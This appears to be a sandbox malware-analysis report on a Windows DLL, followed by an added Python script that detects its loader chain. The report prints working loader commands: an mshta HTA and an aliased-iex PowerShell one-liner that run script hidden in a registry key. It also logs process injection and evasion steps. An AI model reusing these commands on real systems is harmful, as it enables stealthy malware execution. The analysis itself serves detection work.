Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6764 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5717
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3615
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0580FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0580CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_05805A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0580591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
Source: explorer.exe, 00000021.00000000.427438325.00000000051AC000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000021.00000000.427485687.00000000051D2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000021.00000000.384966300.0000000005EAB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000000.383500997.000000000510C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000000.427485687.00000000051D2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
Source: mshta.exe, 00000017.00000003.329575243.0000022F66BCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000017.00000003.329575243.0000022F66BCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000000.383500997.000000000510C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}on:Mondz?S
Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00dRom0cY
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0580A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
Source: C:\Windows\System32\loaddll32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_0580BE55 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 146.70.35.138 80
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF61B5912E0
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF61B5912E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 352000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3616 base: 352000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3616 base: 7FF802BC1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 2BC1580
Source: unknown Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
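The process-creation rows above are the loader chain that the signatures in this report describe: an inline HTA handed to mshta.exe that reads and evals script out of HKCU\Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E, a PowerShell one-liner that hides gp and iex behind random aliases to run the UrlsReturn value of the same key, csc.exe compiling C# on the fly under the PowerShell host, and ping localhost -n 5 used as a sleep. The following Python is an added example, not part of the Joe Sandbox report: it parses rows of this shape (the sample rows are transcribed from the ones above) into a parent/child map, pulls the GUID-named registry key out of both command lines to tie the two stages together, and flags the chain. The rule names and the matching conditions are the editor's own, not the sandbox's signatures.

```python
"""Added example (not part of the Joe Sandbox report): parse 'Process created'
rows into a process tree and flag the registry-resident mshta/PowerShell loader
chain. Rule names and the SAMPLE_ROWS transcription are the editor's own."""
import re
from dataclasses import dataclass

# Rows transcribed from the report's own 'Process created' evidence; the
# format is "Source: <parent image> Process created: <child image> <cmdline>".
SAMPLE_ROWS = [
    r"""Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>""",
    r"""Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))""",
    r"""Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline""",
    r"""Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1""",
    r"""Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5""",
]

ROW_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<image>\S+) (?P<cmdline>.*)$")
GUID_RE = re.compile(r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}")


@dataclass
class Proc:
    parent: str   # parent image path, or "unknown"
    image: str    # child image path
    cmdline: str  # child command line as logged


def parse_rows(rows):
    """Parse sandbox rows; rows that do not match the format are skipped."""
    procs = []
    for row in rows:
        m = ROW_RE.match(row)
        if m:
            procs.append(Proc(m["parent"], m["image"], m["cmdline"]))
    return procs


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def appdatalow_keys(procs):
    """GUID-named keys under HKCU\\...\\AppDataLow referenced by any command line.
    The loader keeps its next stage in such a key; mshta and PowerShell both
    reading the same GUID key ties the two stages to one implant."""
    keys = set()
    for p in procs:
        if "appdatalow" in p.cmdline.lower():
            keys.update(g.upper() for g in GUID_RE.findall(p.cmdline))
    return keys


def find_chain(procs):
    """Return (rule, image basename) findings for the loader pattern."""
    children = {}
    for p in procs:
        children.setdefault(basename(p.parent), []).append(p)
    findings = []
    for p in procs:
        name, cl = basename(p.image), p.cmdline.lower()
        # Inline HTA that evals script read back from the registry.
        if name == "mshta.exe" and "about:" in cl and "regread(" in cl:
            findings.append(("hta_evals_registry_script", name))
        if name == "powershell.exe":
            # Random alias for iex plus a registry read: aliasing defeats
            # simple "iex" string matches, so match the alias definition.
            if re.search(r"new-alias\s+-name\s+\S+\s+-value\s+iex\b", cl) and "hkcu:" in cl:
                findings.append(("aliased_iex_of_registry_value", name))
            # mshta -> powershell -> csc.exe: C# compiled at run time.
            if basename(p.parent) == "mshta.exe" and any(
                basename(c.image) == "csc.exe" for c in children.get("powershell.exe", [])
            ):
                findings.append(("mshta_powershell_csc_chain", name))
        # ping against localhost with a count is a delay, not a network probe.
        if name == "ping.exe" and re.search(r"\bping\s+localhost\s+-n\s+\d+", cl):
            findings.append(("ping_localhost_as_sleep", name))
    return findings


if __name__ == "__main__":
    procs = parse_rows(SAMPLE_ROWS)
    print("registry keys:", appdatalow_keys(procs))
    for rule, image in find_chain(procs):
        print(f"{rule:32} {image}")
```

The chain rule keys on lineage rather than on the random alias names, which change per infection; the registry-key extraction gives the one artefact that is stable across both stages and is the value to pull from a live host for the actual payload.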
